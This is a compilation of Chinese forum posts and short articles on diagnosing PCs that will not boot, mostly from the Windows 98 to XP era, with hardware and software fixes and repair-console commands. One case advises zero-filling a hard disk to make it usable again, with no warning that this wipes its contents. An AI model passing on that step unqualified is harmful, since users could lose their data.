          [解决方法:]重新将计算机外频改回133MHZ后，启动正常。总结：CPU降频也会导致电脑无法开机。

          [系统环境:]　WINXP
          [故障描述:]
      正常关机后电脑重新启动显示器黑屏，重起几次都是如此，排除了显示器本身没有故障，仔细检查后发现也不是系统故障，推测应该是硬件故障。
          [解决方法:]
      拆开电脑主机，依次检查内存，CPU，显卡，都确认没有问题，数据线连接完好，发现主机内部很脏，突然猜想会不会是灰尘太多造成的，立刻用吹风机清洁。故障立刻解决。启动后显示器滴的一声点亮，进入系统。
          总结：小心灰尘杀手！

      [故障描述]xp系统，开机到登陆画面黑屏，重启后故障依旧，进安全模式把显卡驱动删除后就能进入系统，但重新启动后故障又再出现，必须要到安全模式里把显卡驱动删除后才能进入系统。
          [解决方法]怀疑是分辨率的问题，检查分辨率发现为85HZ，把分辨率调到75HZ，重新启动后故障解决了。

          [系统环境:] windows XP SP2 +瑞星杀毒+ 瑞星防火墙
          [基本配置:]AMD 2200+ ;华擎K7VT4-4X主板；双敏9518显卡128M；256M内存;
          [故障描述:] 开机自检后.磁盘扫描.扫描完成后从起:再自检:扫描....进不了XP
          [解决方法:]
      故障是在从装了声卡驱动后出现的.(驱动是在网上搜到的!在华擎网站没找到)启动到安全模式下.卸载了声卡驱动后从起正常!从新装好原来的老驱动.一切正常.

          [系统环境:] Win2000+SP4
          [故障描述:] 显示器点不亮,开机自检后显示器黑屏.
          [解决方法:]先是检查了显卡,内存.最后最小系统法.在拆下网卡后,启动正常.PCI插槽有问题,用打印纸轻擦拭插槽壁n次,插入网卡正常.

          [故障描述:]开机显示：no ide channel 20 found........ 无法进入系统
          [解决方法:]以为是机子坏了，出问题了，瞎忙了半天，却原来是ide接口没接好

          [故障描述]开机找不到硬盘，试了多种方法均无效，连DOS都进不去。
          [解决方法]
          1. 在CMOS设置中屏蔽硬盘，这时机器就可以从软盘引导。
          2.用DM启动盘启动计算机，启动DM万用版,选"(A)dvanced Options（高级选项） -> (M)aintenance
      Options（维护选项） -> (U)tilities实用工具） ->　Zero Fill Drive（扇区充零）", 对硬盘充零.
      充零时不必做完, 可以在零填充一开始后,就可以立即敲esc键停止它.
          3. 此时硬盘就像从未分过区的新硬盘一样,可以重新分区了

          [系统环境:] xp
          [基本配置:]联想品牌
          [故障描述]一日开机突然什么反应都没有了，主机灯一个也不亮，显示器也黑屏，主机喇叭响三秒停一秒的反复叫

      [解决方法]动用了想到的一切办法：检查电源、cpu、内存插拔、显卡插拔，还是没有任何反应。最后用跳线短接放电（没取下电池）还是没变化，最后我说取下电池，将电池两接触片短连几秒，他照做后重启出现coms出错，进入coms重存盘后正常了。

          [系统环境:] WIN98
          [基本配置:]　AMD　Sempron2200+　+华擎 K7S41GX
          [故障描述:]　显示器点不亮,怀疑主板故障更换,还是不行换AMDXP2500+故障依旧
          [解决方法:]反复阅读说明主板CPU外频为100MHZ,跳线使CPU外频从100MHZ改为133MHZ,问题解决.

          [系统环境] : Win XP sp2
          [故障描述] : 开机后可以自检但无法进入系统,到欢迎介面时就没有反应了.
          [解决办法] :
      机子买回来一年多了,出现上面的故障后,我试着把机子打开来,清理一下里面的灰尘,开机后又一切正常了,呵呵.其实灰尘是硬件的第一大敌哦,要注意有空清理一下,不要向我这样懒.

          [系统环境:]升技KV7主板，闪龙2600＋CPU，GF2 TI显卡。
          [故障描述:]昨晚，机器在使用中莫名其妙的关机。再无法启动。

      [解决方法:]开机，可通电，但显示器无显示，也无报警声。拔下内存后开机，有警报声，判断主板可自检，CPU无大问题。插入内存又无报警声。与另一台机器的好SIS
      315显卡交换，两台机器都可正常启动了。看来主板和显卡都没有问题。但换回来，又不能启动了。主板竟然会挑显卡？怀疑电源不足，换上一个电源，可以启动。看来是电源的问题。将换下的电源打开，进行打扫，有很多灰，从来没清理过。没有发现有坏的痕迹。清理后再安装上，故障消失。看来是电源的接触性故障，可能是灰尘造成的。

         [故障描述]：开机（2000系统）进度条过完立刻蓝屏，重启还是进度条过完蓝屏。
         [解决方法:]：内存不兼容，换内存问题解决！

          [基本配置:] C1.7G　 HY DDR266 512M　 磐英845PE　 GF4 64M
          [故障描述:]开机没有自检成功的“嘟”的一声，显示器点不亮，也没有报警声音，打开机箱检查发现每个部件都正常通电。

      [解决方法:]开始以为某个部件接触不良，先后用替换法检查CPU、内存、显卡、硬盘、主板都没有问题。无从入手。后来无意中接上了另外一个电源，居然听到了“嘟”的一声。各位，以后爱机点不亮也要注意一下电源喔！虽然我不知是什么问题！

      [故障描述:]WIN2000系统每次启动时都提示“系统启动时至少有一个驱动程序或服务发生错误，详细信息请查看系统日志。”查看日志，显示：“由于未知的用户名或错误的密码，登录失败。Windows
      Media Unicast Service服务未能启动。”但点确定后系统可以正常使用我用administrator账户和自己设的账户登录都是如此。
          [解决方法:]　首先查看系统日志,找出出错的服务,将其停用,重启,故障解决!

          [系统] win98
          [硬件] C1000 + 精英整合主板,SD128内存在,40G硬盘,
          [故障] 主板报警,不启动,不自检.有书记员几年的开庭资料.无法开庭.
          [解决]
      打开机箱后,重插内存无效,拿下风扇无问题,,其他硬件看来无问题,仔细看,最后发现内存引脚与主板固定螺丝灰尘连在一起,让书记员找了一支毛笔,轻刷下灰尘,启动,OK!!!!

           [故障描述:]
      2003的操作系统，上次关机正常，今天中午开机提示缺少psi.sys文件！试过在安全模式下、最近一次正常启动、GHOST还原等都无法恢复！
           [解决方法:]
      开始以为真的是少了什么文件，准备去别的电脑上COPY个过来！但回想一下，最近没装什么软件，又没卸载什么软件，所以怀疑应该硬件有问题！因为本人后期加了根内存条！所以第一时间拔下跟内存，开机。OK，搞定！怀疑是有跟内存条没插紧造成的！

           [故障描述:] 机器无法启动,自检声一长两短!
           [解决方法:]
      开始就怀疑是显卡问题,这个问题困扰了我很长时间,开始只要给CMOS放电,重插显卡,就又正常了,这样问题反复出现几次.最后干脆怎么处理也无法启动了,用替换法替换显卡,机器一切正常.把有问题的显卡插到主板上放一晚上,第二天一切又正常了,最后断定原来的显卡电容有问题.

          [系统环境:] windows XP
          [基本配置:]AMD 2800+ ;华擎K7VT4-4X主板；昂達128M；256M内存;
          [故障描述:] 有个MM上网死机后按了重起之后，主机灯亮，显示器灯亮，再无信息。打开机箱后一切正常。
          [解决方法:] 原来机箱上的重起键被MM压进去没弹出来。。敲打机箱重起键弹出，机子正常。

          [系统环境:]win2000
          [故障描述:]开机，无法进入，提示RAID卡松动。重新插入，问题依旧。

      [解决办法:]用力插，插到绝对进为止。呵呵，开玩笑了，这样就没什么好分享的了！插好后，提示一样，无法进入系统。肯定问题不在RAID卡上！查早原因，发现RAID卡工作环境有很大的要求！因为当时天气很冷，怀疑是这个原因造成。所以立即把空调温度打高！过了段时间在开机，OK！哈哈，原来还有这样的问题。可怜了我以后每天要提早上班！55555

          [故障描述:] 开机无显示，按重起有时可以启动。有时不可以。
          [解决方法:]
      刚开始总以为是内存出问题，就拆开机箱清理一下，故障还是时有时无，很不稳定，就差CPU没拆出来清理了。组机一年。CPU没清理过。拆开一看。果然。。旁边有一层灰尘。清理。OK。用到现在再没这种现像。

          [系统环境:]　Windows XP SP2 +瑞星杀毒+ 瑞星防火墙
          [基本配置:] 电源:爱国者300瓦电源
                       CPU:AMD 2500+
                       主板:ASUS A7V8X-X
                       显卡:NVIDIA GeForce4 MX 440 with AGP8X
                       光驱:ASUS CD-S520/A
                       内存:Kingston DDR256M

      [故障描述:]在夏天玩魔兽时(冰封)很容易出现电脑断电，5-30分钟不定，而且不能RESET，必须拔电源5秒左右再插上才可以重启。平时上网，运行OFFICE、PHOTOSHOP等都不会出现问题，玩CS基本不会出现这种情况，WE8有时会出现。由于冬天没有出现问题，我开始怀疑是CPU或显卡过热，（CPU和显卡风扇正常运转），拆了机箱用风扇吹照样断电。内存我换过几次插槽，没用；CPU拆过，硅胶没问题；怀疑电源供电不足，拔了光驱和机箱风扇，也没用；系统我是XP，充装过几次还不行
          [解决方法:]跟同学换了个其他电源就可以了,但暂时还不知道是什么回事,因为原来的电源给同学用了十天左右都没出现过问题。

          [系统环境:] 蕃茄版 Windows XP SP2 ，没有上网，故也没有杀毒软件和防火墙之类
          [基本配置:] C1.7G，金邦 256M ddr266 内存，希捷 40G 7200转 硬盘（新加坡产的），顶星845主板，集成声显卡。
          [故障描述:]
      昨天将自己的硬盘拆下挂在别人电脑上做从盘COPY了一点东东，拿回来放在自己电脑上，开机，进入XP滚动条后，电脑无反应，按键盘上NUM
      LOCK键，灯无反应，说明电脑已死机，重启，故障依旧，开机按F8，选择最后一次正确配置，故障还是一样，开机按F8，选择安全模式，等了10几分钟，终于可以进入安去模式了，但电脑速度爆慢，打开“我的电脑”需要10分钟左右，有时进行任何操作都无反应，查看CPU利用率，也不是很高，不到5％，考虑不到问题原因所在，再重启，偶然发现开机时主板画面上显示硬盘还是从盘（电脑就接一块硬盘时，设置成主盘或从盘都无所谓的），可我明明记得自己已经更改跳线成主盘了，将硬盘再拆下来，结果一看，原来真是自己设置错了，我的硬盘可能比较特殊，有一种比较特殊的跳线模式，上面写着“Alternate
      capacity:limits drive capacity to 32
      Gbytes”，而我真是搞错了，设置成这种模式了，我的英文水平比较差，不过看字面意思好像是
      限制硬盘使用不能超过32G，而我的硬盘是40G，并且里面大部分盘都装满了，
          [解决方法]： 将硬盘跳线重新改成主盘，重启，OK，
          [ 总　结 ]：电脑出故障，不要急，一步一步来，可能有时抓住偶然的发现就可以帮你解决问题。

          [故障描述]：开机有1长三短的报警声
          [故障分析]：1长三短是内存或内存有问题，用橡皮擦除内存金手指上的脏东西和氧化物！
          [解决办法]： 用橡皮擦除内存金手指上的脏东西和氧化物！开机无效！最后用铁片在内存槽金属引脚上括一括去除氧化层后！开机就正常了！
          各位网友不单是内存有问题哦！还用小心内存槽哦！！

          [故障描述]：一次公司的电脑的显示器突然跳不起来了，可是电脑主机有正常自检的声音。
          [解决方法:]
      ;我刚开始还以为背后的线松了，可是我重新插了几次都不行。。。后来我来就想是不是显卡松了，我也重新拔插了显卡，也没有解决。最后我想会不会是显卡的插孔有灰尘进入，堵住了信号的输出和输入。于是我就用工具把插孔吹了一下，把里面的灰尘吹了出来。问题就搞定了。灰尘可真是电脑的一个大敌啊。

          [系统环境:] windows XP(sp1)
          [基本配置:]联想品牌机未来先锋711　p4 1.3G 128m内存
          [故障描述:]挂双硬盘时只能认出一块，而且两块一起挂时系统启动不了
          [解决方法:]开始不知道怎么回事，当挂载一块硬盘时就可以认出来而且可以正常启动。
      百思不得其解时想起那天浏览论坛时，说道如果两块硬盘全设置成主硬盘时就可能不能正常启动，只能一块设置程主硬盘，一块设置成从硬盘。然后我就查下硬盘按照硬盘上的标识（硬盘后面针脚的跳线设置方法），通过改变跳线，重起机器就可以正常启动而且两块硬盘都认出来了，至此故障解决。

          [基本配置]主板：技嘉GA81DXH　内存：SDR256
          [故障描述]偶然开机时，遇到黑屏机子的小喇叭一直不停的鸣叫。

      [故障排除]根据这样的现象预感到内存出现问题，打开机箱，将内存再插一次，然而现象依然如故。没办法只好将内存取出查看，发现内存条的1/2倍厚厚的灰尘所覆盖。于是拿来一只毛笔，将上面灰尘清理干净后插入，一切OK!

      分析原因：由于此种型号主板，将内存条插槽与CPU的间距太近，致使CPU降温风扇将灰尘吹到了内存条上，长期灰尘不断积累，是内存条表面被灰尘覆盖，导致此种现象的发生。

          [系统环境:] widnows xpsp2
          [基本配置:]杂牌845GL主板,ddr256内存迈拓10G
          [故障描述:] 朋友家的机器原来装windowsxpsp1,集成显卡驱动一启用就不能够进系统.于是重新装过系统刚装完后花屏,

      [解决方法:]怀疑集成显卡没有装好.于是放入主板驱动,按照顺序安装了主板显卡,声卡后还是不行.上网下载最新的i845gl集成显卡驱动安装后正常.

          [系统环境:] WINDOWS XP SP1
          [基本配置:] AMD XP2200+　 宇瞻512M内存
          [故障描述:] 电脑放在宿舍一个月未开(因为过年回家),回来后,开机发现没办法启动
          [解决方法:]打开机箱,把内存重新插拔了一下,就可以重新正常启动了

          [系统环境:] Windodws XP SP2 + 金山组合
          [基本配置:] C4 1.7G + 256M DDR + G2 MX440
      硬盘两块，一块是40G希捷硬盘，另一块为昆腾3G多的老硬盘，为BT下载专用
          [故障描述:]
      开机运行到就要进入桌面，欢迎音乐刚响完，屏幕显示“正在载入个人配置”时死机，屏幕不动，键鼠均无反应。多次重启，偶尔一次能进入系统，但系统运行异常慢，运行2分钟左右后死机
          [解决方法:]
          1、尝试进安全模式，可以进入。疑软件冲突，安全模式下卸载最近安装的软件、补丁等后重启，故障依旧；
          2、安全模式下进行系统还原，重启后无效，启动列表选“最后一次正确配置”，无效；
          3、安全模式下运行系统配置实用程序，禁用所有应用程序随机启动，重启，无效；
          4、由于该机杀软病毒库最新，且实时监控和网络防火墙均已打开，基本排除病毒原因；
          至此，怀疑故障源自硬件：
          搬出机箱，手摸机箱后面的电源，有点烫手。干脆打开机箱，手摸显卡、硬盘均感烫手，尤以那块老昆腾硬盘最为明显。摘下昆腾硬盘，重新开机，故障消失。。。
        [分析：]由于此机运行一直正常。只是入夏以来市电供应紧张，此机没有接UPS，导致电源供电明显不足，老昆腾硬盘更为耗电，致使电源出现“小马拉大车”现象，使得各部件温度升高，无法正常工作。

          [基本配置:]P4 2.4G + 256M DDR + G4 MX440
          [故障描述:] 一开机显示器就显示无信号！
          [解决方法:]
          １、怀疑是显示器的连线与显卡没有插紧，重新插拔之后还是无效！
          ２、进而怀疑显卡与主板的ＡＧＰ插槽没有插紧,重新插拔之后依然无效！
          ３、之后怀疑显卡已坏，从一台运行良好的电脑上拆了一块好显卡插上之后还是无用！
          ４、此时怀疑主板已损坏，把内存拔下之后，开机无报警声，此时证明主板已损坏（因为前几天偶们这里下了一阵雷雨），更换主板之后问题解决！

          [系统环境:] windows XP SP2
          [基本配置:] P4 1.3 + intel850 (兼容机)
          [故障描述:] 重新安装系统后,每次运行时,当运行到XP滚动条时,就停止不动了.
          [解决方法:] 检查各硬件,没有发现任何问题,开始认为系统没有做好,重新安装后,故障依旧,最后更换一条硬盘的数据线,故障解决.

          [系统环境]：2000PRO+sp4
          [基本配置]：845主板+GF2显卡+HY DDR256内存
          [故障描述]：机主早上上班开机，机器长鸣无法过自检，不能启动。

      [故障解决]：根据BIOS自检时响长声，判断内存接触不良，拆开机箱重拔插内存并用橡皮插了金手指，给内存插槽除了下尘。再开机，听到自检通过声“嘀”1声响，紧接着有两个很微弱的响声之后机器又长鸣，机器停在自检logo画面.这样的问题是头一次遇到，我首先怀疑是内存问题。把内存接到另一个机子上，自检启动都成功。再接到问题机，仍旧如故。于是我把机器弄到办公室（只是主机，没有拿鼠标键盘)仔细观察，并没有发现什么异常，接上我自己用的键盘鼠标，开机启动。一切正常。重启好几次也没出问题。我还以为是主板上插的部件接触不好，在搬动过程中又接触到位了呢。结果拿去机主那里接上鼠，键盘还是长鸣。根据前面的情况，我把故障点锁定在鼠标，键盘，电源接线上。结果把鼠标拔下时启动就正常了，然后换了另一个使用正常的鼠标给机主解决问题。

          [系统环境:]winxp
          [系统故障:]开机时主机内一直有响动并且起不了机器。

      [解决方法:]开始以为可能是声卡出了什么问题，但是当打开机箱后仔细查看后发觉并没有什么问题，最后发现原来是内存条没有插牢，再次插牢后起机一切正常！

          [故障描述：]

      朋友送修一台机器，配置为C1.1，256M，科盟61815E/T主板，40G硬盘，杂牌机箱电源。现象为使用过程中机箱内发出“嚓、嚓、嚓”的异响，随即黑屏，机箱电源灯长亮，只能拨电源插头关机，之后不能开机。
          [解决方法：]

      因按下电源开关机器无任何反应，初步判断为电源、主板、CPU等问题，替换后发现电源、CPU无问题，进一步把问题集中在了主板上。仔细观察主板无任何短路、电容问题，折腾了两个多钟头，还是不行本想第二天带去电脑城修理。

      后来闲着没事，随手用跳线清空BIOS，没想到再开机的时候CPU风扇开始转了，不过没显示，随即想到跟BIOS放电，取出了电池，用万用表量了一下，发现电压只有0.1V，换上我自己机器主板的电池(电压2.5V)，开机，一切正常，主板欢快的“滴”一声，进入BIOS，恢复默认，再重启，正常进入系统，使用至今已经一个星期了，没出现问题。
          [原因分析：]

      以前认为主板电池只是为了保存CMOS信息的作用，自己也试过不要主板电池的机器也能正常开机，只不过每次都要重新恢复一遍BIOS才行，不知道是因为这款主板的原因还是其它问题。
          [　总　 结： ]
          以前都认为只要一涉及到主板问题，一般的业余爱好者都基本放弃，有时也要想远一点，多试试，本来就有可能是小问题，自己就能解决的。

          [故障描述:] 开机后就只听到风扇的转动声,连"滴"都没.电脑没办法启动了!
          [解决方法:]
      把内存重新插拔了一次,内存槽也清理了!结果还是老样子!怀疑内存出问题了,拔下内存,然后开机,电脑长鸣不断疯狂的清理内存条和插槽!过了许久,插上去后,期待已久的"滴"终于出来了。问题解决!Happy!
          心得:不要以为插拔过内存条一次,就可以把内存的故障排除掉

          [故障描述:]系统启动后出现Starting
      Windows98。。。信息，随即死机。由于WINDOWS98的DOS启动部分受到损坏，有些机器启动进入以前版本的DOS后，第二次启动也会出现这种情况。
          [解决方法:]在安装WIN98时将启动盘插入软驱，启动后传送DOS7。0系统给C盘，即键入sys c：，再启动即可

          [故障描述]：登录系统时就会出现“NTLDR IS MISSING PRESS ANY KEY TO RESTART”的故障提示
          [解决方法]：进入故障恢复控制台，然后插入 WINDOWS XP 安装光盘，接着在故障恢复控制台的命令状态下输入“copy
      x:\i386\ntldr c:\”命令并回车即可（“x”为光驱所在的盘符），然后执行“copy x:\i386\ntdetect.com
      c:\”命令，如果提示是否覆盖文件，则键入“y”确认，并按回车键。

      在遇到NTLDR文件丢失的故障时，boot.ini文件多半也会出现丢失或损坏的情况。这样在进行了上面修复NTLDR的操作后，还要在故障恢复控制台中执行“fixboot
      c:”命令，在提示是否进行操作时输入“y”确认并回车，这样WINDOWS
      XP的系统分区便可写入到启动扇区中。当执行完全部命令后，键入“exit”命令退出故障恢复控制台，重新启动后系统即可恢复如初。

          [故障描述] :单位有一批机器,基本配置如下:intel 810芯片组主板,WD 40G硬盘;128M
      HY内存.前一天晚上开机运行一切正常,第二天开机,发现有3~5台不能启动.电源风扇不转.
          [解决方法]:
      一次偶然机会拔下电源线,用手触摸机箱外壳.结果电脑奇迹般启动了.一切恢复正常.后来发现不能启动的机器,拔下电源线用手触摸(一手摸机箱,一手触地),都能顺利启动.
          [分析]: 仔细检查机箱,都置于干燥的绝源的木板上.原来机箱外壳上积蓄了大里的静电无法自然的排除,导致机器无法启动.

          [故障描述]：1.我装了Windows Me和Windows XP双系统，都是FAT32格式。C盘Windows Me，E盘装Windows
      XP。前些天，Windows XP系统丢失了SYSTEM32.DLL，启动不了。于是我在进入Windows Me系统内，在E盘直接删除Windows
      XP，并将E盘格了，但是，每次开机都出现多系统启动菜单，供选择。我该怎样才可以彻底删除XP？
      2.同样，我装过XP与LINUX，但用PQmagic格式化ext3文件，重装xp，但是装的时候重启进行配置，出现grub登录界面，怎么去掉它，继续xp的安装？
          [解决方法]：用一张Windows 9x/Me的启动盘启动，在“A:”下输入“SYS
      C:”，给C盘重新传系统即可。第二个问题，就是启动盘启动后，fdisk/mbr即可，重新写mbr就行了

          [系统环境:]win2000sp4
          [故障描述:]启动系统提示\winnt\system32\config\system文件损坏或丢失,无法进入系统.之前没有备份注册表.

      [解决方法:]光盘启动进入纯DOS下,拷贝\winnt\repair\目录下的system文件(装完系统,自动备份的注册表原始文件)覆盖\winnt\system32\config\目录下的system文件.退出重启,问题解决,但有小部份驱动程序和软件得重装.(如有双系统,可进另一系统直接操作拷贝,如有出现文件正在使用无法覆盖可在system文件加个后缀如.exe后删除,再将文件拷过来)

      [故障描述]：电脑开机时,显示找不到:c:\windows\system32\rundll32.exe文件,也下载了新的rundll32文件.但是不能够替换原来的文件,都是显示!估计是我的电脑感染了病毒
          [解决方法]：将windowsxp安装光盘放入光驱，运行CMD，再DOS窗口下运行如下命令：
      expand 光驱盘符:\i386\rundll32.ex_ %Systemroot%\rundll32.exe，
      然后重新启动电脑即成功修复了Rundll32.exe

      [故障描述:]电脑正常开机只能进入windows98的启动画面就是不能进入系统，但是在安全模式下就可以进入windows98系统里而且很正常没有一点问题．
          [解决方法]：
          １．先看一下内存条没有问题．
          ２．看一下显卡和cpu会不会没有接好，bios放电但是全没有用
          ３．这时我想会不会外置的东西有问题，没想到我把接在USB上的打印机插子拔了出来就好了．

          [基本配置:] 566　128M
          [系统环境:] WIN98
          [故障描述:] 电脑有时点得亮，有时点不亮。
          [解决方法:]
      总结以前的经验得出，先检查电源、CPU、内存。如果没有问题，就把主板拆下来，看是不是机箱把主板弄变形了。一般来说，都是因为主板变形，导致其它部件接触不良。但这次却是个大问题，在按压南桥芯片时，就可以点得亮，不按压就无法点亮。证明了南桥芯片已经松脱虚焊了，因为是二手板，就建议机主重新购买一块主板比拿去修还合算。

          [系统环境:] XPSP2
          [故障描述:]开机启动到XP滚动条跳出高级启动菜单，提示硬件或软件故障（呵呵等于没说），无论选何种方法都无法成功启动系统。

      [解决方法:]设从光驱启动，放进一张系统维护光盘，试加载一个winPE迷你光盘系统，加载过程中提示错误（此时正在把系统装入内存）。初步确定为内存条问题，打开机箱，仔细检查内存条与内存插槽，发现除少许灰尘外并无异状。用刷子清理一下插槽的灰尘，用橡皮擦下金手指，重新插好，开机启动可以正常进入系统。故障排除。
          [故障原因:]估计是由于机箱不小心的碰撞或灰尘引起的金手指与插槽接触不良所至。

          [系统环境:] winxp
          [故障现象] : 笔记本电脑开不了机，只能进入到Winxp等待画面 经过发现，原来是关机时还没把连接USB接口的U盘安全退出只要把U盘取出
      就可以正常的进入系统

          [系统环境:] :windows XP
          [故障描述:] :开机时电脑屏幕“定”在第一个画面 过了很久都无响应
                            无法进入系统
          [解决方法:]　拆下机箱，找到主板的电池。取下来 再装回去
                           再重新启动就可以进入系统了

          [系统环境:]：win98
          [故障现象] : 电脑启动不了，启动画面一闪就没了，屏幕上出现“超频保护中”的字样
          [解决办法:]:能启动，硬件没有损坏，是系统的问题？只能从软件方面找......
          重启系统，按”DEL“进入COMS，没问题.......，再重启按F8键，看能不能进入“安全模式”，终于看到桌面了......
          重启进入DOS，在盘符下打入“scanreg/restore”
          回车，选了一个很早的日期，重启后.......问题依旧，呆呆的看着屏幕......咦!!!
          忽然看到了那行字上面的几个数字“XXXXMHZ/XXXXMHZ，好象是........

      明白了，再次重启，进入安全模式，在桌面上点右键，进入“显示属性”点“设置”页标签，点“高级”按钮，选“适配器”，在“刷新速度”里选“默认的适配器”
          确定后，重启............，终于看到久违的98桌面了。

          系统环境:]：winXP
          [故障现象] : 电脑启动不了开机显示硬件信息时卡住不动.按F1.F2均没用(华擎CMOS按F2进入
          [解决办法:]:初步怀疑可能是CMOS设置有问题.想恢复默认值没想到按F2进不去CMOS。
                       又想当开机检测内存时卡住.于是重新插拔内存.换单条.无果.
                       最后采取主板电池放电法(非逼我这文化人动粗,嘿嘿)..开机正常.
          结论:CMOS参数设置混乱导致主板检测失败.如遇到进不去CMOS的.可以才用以上"放电法"

          [基本配置:] 赛扬1.6 256MB　UNIKA速配7918显卡(兼容机)
          [系统环境:] windows 2000
          [故障描述:] 系统无法正常启动,到DOS界面死机,无法进入BIOS

      [解决方法:]怀疑硬盘有问题,换过后仍如此,内存和CPU也没事,最后感觉就显卡没换了,抱着试试看的心态换下,竟然好了!随后换上坏的还是不可以正常启动,随认定是显卡有问题!~<不好意思,我是新手所以才这么麻烦!不然早就解决了>请大家多多指教!~

          [故障描述] 开机后的BIOS画面显示了大半天（大约有三分钟），进入系统的时间估计也有七八分钟！出奇的慢！但是系统又能正常使用。
          [故障分析] 在BIOS显示那么长时间，我第一个感觉就是硬件方面出问题了，因为系统开机时所进行的进程就是检测硬件。
          [故障解决]
      依据经验，我把显卡，内存重新拨插一下，把内存的金手指擦了一下（一般这两个部件经常会有问题），再把其它没必要的配件去除（比如说网卡，光驱，及其它PCI卡），只留下最基本的硬盘线！发现重启后故障依旧，后来干脆把硬盘的数据线换掉，先借光驱的数据线来用，换完之后，故障解决，系统启动又很快了！
          [总结]
      想要快速准确地解决问题，判断是很重要的，先分清是软问题还是硬问题，软问题最笨的方法是重装（驱动或系统），硬问题的方法就是排除法和替换法。

      |返回首页|关于我们|联系方式|隐私政策|网站地图|免责声明|管理制度|友情链接|建站日志|广告合作|电脑论坛|

      电脑爱好者俱乐部 浙ICP备06021024号 版权所有 未经许可 禁止复制和建立镜像 感谢赛友在线提供服务器和带宽支持


系统启动后为什么直接进入了关机画面

《一键清理系统垃圾》

系统启动后为什么直接进入了关机画面

  病因分析：造成启动是系统接直接进入关机的原因主要是系统文件Vmm32.vxd丢失或该文件的数据出现了错误，解决这一故障的有效方法是重新安装系统。

  治疗方法：在DOS状态下将Vmm32.vxd文件删除或改名，然后重新安装系统。

  注意：Windows安装光盘上可能有Vmm32.vxd文件，将其拷贝到系统中，系统同样无法正常运行，因为在安装操作系统时要向Vmm32.vxd文件写入一些信息后才能正常使用


显示器启动黑屏的逐步检查法

《一键清理系统垃圾》

显示器启动黑屏的逐步检查法

    显示器无显示（又称黑屏），是一种显示器最常见的故障现象。通常硬件故障引起的黑屏主要发生在启动的时候，使用中发生的黑屏多由于软件引起的。本文主要探讨前者的解决办法，下面提供的方案大家可以按顺序进行，直到问题解决。
    1、检查显示器电源是否接好并已上电
    显示器上电时有“嚓”的一声声响。若未接好请将显示器电源接好后再开机检查。
    2、检查显示器亮度、对比度、显示位置旋钮是否调整在正常位置
    3、检查显示器信号线与显示卡接触是否良好
    如果未接好，请将显示信号线与显卡接好。
    4、换一台正常显示的显示器
    5、检查显示卡与主板接触是否良好
    如果显示卡与主板接触不良，请检查主板插槽是否损坏导致黑屏。
    6、将显示卡换一个主板插槽再开机
    7、换一块工作正常的显示卡
    8、内存与主板接触是否良好
    如果内存与主板接触不良，请检查是否内存故障引起的黑屏。
    9、CPU是否超频使用
    如果CPU是超频使用，请降回CPU原始的频率。
    10、扩充显示内存插接是否正常
    如果扩充显示内存插接不正常，请将显存重新接试试，如不行请更换显存。
    11、驱动器信号线连接是否正常
    如果有驱动器信号线有接反的情况,请立即改正。
    12、请专业维修人员处理。
作者：金永
来源：家用电脑


详解MSCONFIG启动项

《一键清理系统垃圾》

详解MSCONFIG启动项

经常有网友来询问,为何我的开机会弹出窗口,而我一般会答复对方,开始-运行-msconfig-启动,把网址钩掉,还有hta后缀的htm后缀的url后缀的都钩去,而有的网友会询问为何启动后本来修复好的项目又被改了,我会回复开始-运行-msconfig-启动,把关于regedit/s的钩去,不过道高1米,魔高1.1米,我们往往会漏掉什么,而把msconfig里面的启动项全部钩掉再一个个测试那是不大实际的,so,我们现在就来讲讲msconfig启动里面哪些才是默认启动的项,哪些是非法的项.

一般呢,我们都是用win98se第二版的,这个版本有七八个默认的启动项.

Welcome C:\WINDOWS\Welcome.exe /r
欢迎进入Windows程序,这个不用我说了吧,每个人第一次启动系统的时候都会有这个欢迎程序出现的,几乎没有什么用途.

TaskMonitor C:\WINDOWS\taskmon.exe
任务检测程序,这个监视器将记录你使用软件的情况，然后将这些资料保存到 windows\applog的applog.ind文件中

internat.exe internat.exe
注意哦,这里的internat很多人会误以为是网络什么有关的,其实不然,因为他和英特网internet差一字哦,这里这个internat是输入法图标的工具,一般本机只有一个输入法的都不需要运行这个.(任务栏里面的En图标)

ScanRegistry C:\WINDOWS\scanregw.exe /aotorun
注册表备份程序,每次开机都备份一次注册表,这个呢,其实我是建议大家使用,因为现在恶意代码网站太多了,如果不小心被破坏了,还可以恢复上一次的注册表.

SystemTray SysTray.Exe
管理驻留内存的程序,建议保留,这样的话,电脑用一段时间后系统会越来越慢的状况会减轻一点.

SchedulingAgent C:\WINDOWS\SYSTEM\mstask.exe
系统计划任务程序,我不解释了,一般没什么用.

LoadPowerProfile Rundll32.exe powrprof.dll,LoadCurrentPwrScheme(可能会出现两次)
电源管理程序,如果禁用掉后,在控制面版-电源管理,里面设置的就没有效果了.

以上这些就是windows一些默认启动的项目了,然后自己排除掉一些后来安装的软件,比如3721的中文网址,网络蚂蚁,多媒体键盘,鼠标之类的,一般就可以知道哪些项该去掉了吧,

最好的英语学习工具软件Listen to me


寻找个人电脑启动故障的根源

《一键清理系统垃圾》

寻找个人电脑启动故障的根源

    计算机的许多故障的外在表现大部分都是无法正常启动，由于计算机启动过程是个很复杂的过程，同样表现为无法正常启动的计算机，故障却不一定相同。作为一个计算机用户，我们应该了解计算机启动的具体过程，因为它能帮助我们迅速地判断计算机故障具体出在哪个环节、哪个设备上。下面简单介绍一下计算机启动过程及过程中常见故障的判断方法。

    计算机启动过程是个很复杂的过程，它有一个非常完善的硬件自检机制，在通电自检短暂的几秒钟里，计算机要完成100多个检测步骤。首先，我们先来了解两个概念：第一个是BIOS(基本输入输出系统)。BIOS是一组被“固化”在计算机主板中，直接与硬件打交道的程序。计算机的启动过程是在主板BIOS的控制下进行的。第二个是内存地址，计算机中安装的内存为了便于CPU访问，每一个字节都被赋予了一个地址。下面我们先来了解一下计算机的启动过程。

    按下电源开关时，电源开始供电，计算机的指示灯亮起。如果这时计算机没有反应，电源指示灯、风扇也都没有动静，先检查一下计算机的各个线路有没有问题。如果线路正常，那有可能是计算机的电源或是主板出了问题，可以打开机箱用电表一测便知。如果两个测试后都没问题，那还有一个可能是CPU出了故障，可以更换别的CPU进行测试。

